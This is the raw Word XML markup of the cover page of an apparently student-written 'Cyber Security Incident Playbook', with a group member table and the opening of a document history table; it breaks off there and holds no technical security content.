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44D19" w14:textId="77777777" w:rsidR="00F3271D" w:rsidRDefault="00F3271D" w:rsidP="00A9194F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="70"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="725E79F1" w14:textId="77777777" w:rsidR="00F3271D" w:rsidRPr="004D5913" w:rsidRDefault="00F3271D" w:rsidP="00E10905">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="70"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D7905CB" w14:textId="77777777" w:rsidR="00E933E5" w:rsidRPr="004D5913" w:rsidRDefault="00707D4C" w:rsidP="00F3271D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="70"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>CYBER SECURITY INCIDENT PLAYBOOK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DFFE50" w14:textId="77777777" w:rsidR="00F3271D" w:rsidRPr="004D5913" w:rsidRDefault="00F3271D" w:rsidP="00E10905">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="70"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="4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559"/>
        <w:gridCol w:w="3745"/>
        <w:gridCol w:w="2465"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F3271D" w:rsidRPr="004D5913" w14:paraId="69EE582F" w14:textId="77777777" w:rsidTr="7F3C1250">
        <w:trPr>
          <w:trHeight w:val="400"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A2BF411" w14:textId="77777777" w:rsidR="00F3271D" w:rsidRPr="004D5913" w:rsidRDefault="00F3271D" w:rsidP="00F3271D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Practical Class Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="733F0212" w14:textId="77777777" w:rsidR="00F3271D" w:rsidRPr="004D5913" w:rsidRDefault="00F3271D" w:rsidP="00F3271D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Group Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3745" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="533F5AD5" w14:textId="77777777" w:rsidR="00F3271D" w:rsidRPr="004D5913" w:rsidRDefault="00F3271D" w:rsidP="00F3271D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2465" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="408C859B" w14:textId="77777777" w:rsidR="00F3271D" w:rsidRPr="004D5913" w:rsidRDefault="00F3271D" w:rsidP="00F3271D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Matric No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F3271D" w:rsidRPr="004D5913" w14:paraId="7A104A5E" w14:textId="77777777" w:rsidTr="7F3C1250">
        <w:trPr>
          <w:trHeight w:val="423"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77B9EAD9" w14:textId="09341373" w:rsidR="00F3271D" w:rsidRPr="004D5913" w:rsidRDefault="7F3C1250" w:rsidP="00F3271D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>[CLASS]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="327376A0" w14:textId="624A5CCA" w:rsidR="00F3271D" w:rsidRPr="004D5913" w:rsidRDefault="7F3C1250" w:rsidP="00F3271D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3745" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="129AB244" w14:textId="6D145ECE" w:rsidR="00F3271D" w:rsidRPr="00F3271D" w:rsidRDefault="00436E94" w:rsidP="00436E94">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Member 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2465" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53B5A1E2" w14:textId="7E997887" w:rsidR="00F3271D" w:rsidRPr="00F3271D" w:rsidRDefault="00436E94" w:rsidP="00F3271D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>[REDACTED]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007965F1" w:rsidRPr="004D5913" w14:paraId="544AB36F" w14:textId="77777777" w:rsidTr="7F3C1250">
        <w:trPr>
          <w:trHeight w:val="400"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E01EE3C" w14:textId="77777777" w:rsidR="007965F1" w:rsidRPr="004D5913" w:rsidRDefault="007965F1" w:rsidP="007965F1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B1D57D4" w14:textId="77777777" w:rsidR="007965F1" w:rsidRPr="004D5913" w:rsidRDefault="007965F1" w:rsidP="007965F1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3745" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FBF264B" w14:textId="2F8853C0" w:rsidR="007965F1" w:rsidRPr="00F3271D" w:rsidRDefault="00436E94" w:rsidP="007965F1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Member 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2465" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="632D19FC" w14:textId="06A034E8" w:rsidR="007965F1" w:rsidRPr="00F3271D" w:rsidRDefault="00436E94" w:rsidP="007965F1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>[REDACTED]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007965F1" w:rsidRPr="004D5913" w14:paraId="1965775A" w14:textId="77777777" w:rsidTr="7F3C1250">
        <w:trPr>
          <w:trHeight w:val="423"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50D28FD3" w14:textId="77777777" w:rsidR="007965F1" w:rsidRPr="004D5913" w:rsidRDefault="007965F1" w:rsidP="007965F1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38E47E13" w14:textId="77777777" w:rsidR="007965F1" w:rsidRPr="004D5913" w:rsidRDefault="007965F1" w:rsidP="007965F1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3745" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30C57260" w14:textId="61F00C82" w:rsidR="007965F1" w:rsidRPr="00F3271D" w:rsidRDefault="007965F1" w:rsidP="007965F1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Member 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2465" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21C18DB1" w14:textId="5687D66A" w:rsidR="007965F1" w:rsidRPr="00F3271D" w:rsidRDefault="007965F1" w:rsidP="007965F1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>[REDACTED]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007965F1" w:rsidRPr="004D5913" w14:paraId="2B342C66" w14:textId="77777777" w:rsidTr="7F3C1250">
        <w:trPr>
          <w:trHeight w:val="400"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64A06613" w14:textId="77777777" w:rsidR="007965F1" w:rsidRPr="004D5913" w:rsidRDefault="007965F1" w:rsidP="007965F1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7878D172" w14:textId="77777777" w:rsidR="007965F1" w:rsidRPr="004D5913" w:rsidRDefault="007965F1" w:rsidP="007965F1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3745" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E080DDB" w14:textId="66205CC2" w:rsidR="007965F1" w:rsidRPr="00F3271D" w:rsidRDefault="007965F1" w:rsidP="007965F1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Member 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2465" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="260865C0" w14:textId="6A50E5DA" w:rsidR="007965F1" w:rsidRPr="00F3271D" w:rsidRDefault="007965F1" w:rsidP="007965F1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>[REDACTED]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3163FDC5" w14:textId="77777777" w:rsidR="00A9194F" w:rsidRDefault="00A9194F" w:rsidP="00A9194F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc220896676"/>
    </w:p>
    <w:p w14:paraId="33B4209D" w14:textId="607631DE" w:rsidR="001D327F" w:rsidRPr="00A9194F" w:rsidRDefault="0037416B" w:rsidP="00A9194F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Document Control</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2053FA23" w14:textId="77777777" w:rsidR="001D327F" w:rsidRPr="00425A60" w:rsidRDefault="001D327F" w:rsidP="001D327F">
      <w:pPr>
        <w:pStyle w:val="Header"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Document History</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9638" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2409"/>
        <w:gridCol w:w="2410"/>
        <w:gridCol w:w="2409"/>
        <w:gridCol w:w="2410"/>
      </w:tblGrid>
      <w:tr w:rsidR="001D327F" w:rsidRPr="004D5913" w14:paraId="72F41C15" w14:textId="77777777" w:rsidTr="63B205A3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="50AFC5B0" w14:textId="77777777" w:rsidR="001D327F" w:rsidRPr="00425A60" w:rsidRDefault="001D327F" w:rsidP="00D82677">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="023FDAE4" w14:textId="77777777" w:rsidR="001D327F" w:rsidRPr="00425A60" w:rsidRDefault="001D327F" w:rsidP="00D82677">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="66BD0A28" w14:textId="77777777" w:rsidR="001D327F" w:rsidRPr="00425A60" w:rsidRDefault="001D327F" w:rsidP="00D82677">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="241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7D3B9C9D" w14:textId="77777777" w:rsidR="001D327F" w:rsidRPr="00425A60" w:rsidRDefault="001D327F" w:rsidP="00D82677">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Comments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D327F" w:rsidRPr="004D5913" w14:paraId="1CA56D55" w14:textId="77777777" w:rsidTr="3C8C28D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="19E644F2" w14:textId="6C31E15E" w:rsidR="001D327F" w:rsidRPr="00CB4373" w:rsidRDefault="4948777A" w:rsidP="001D327F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>th</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> January 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:tcMar>
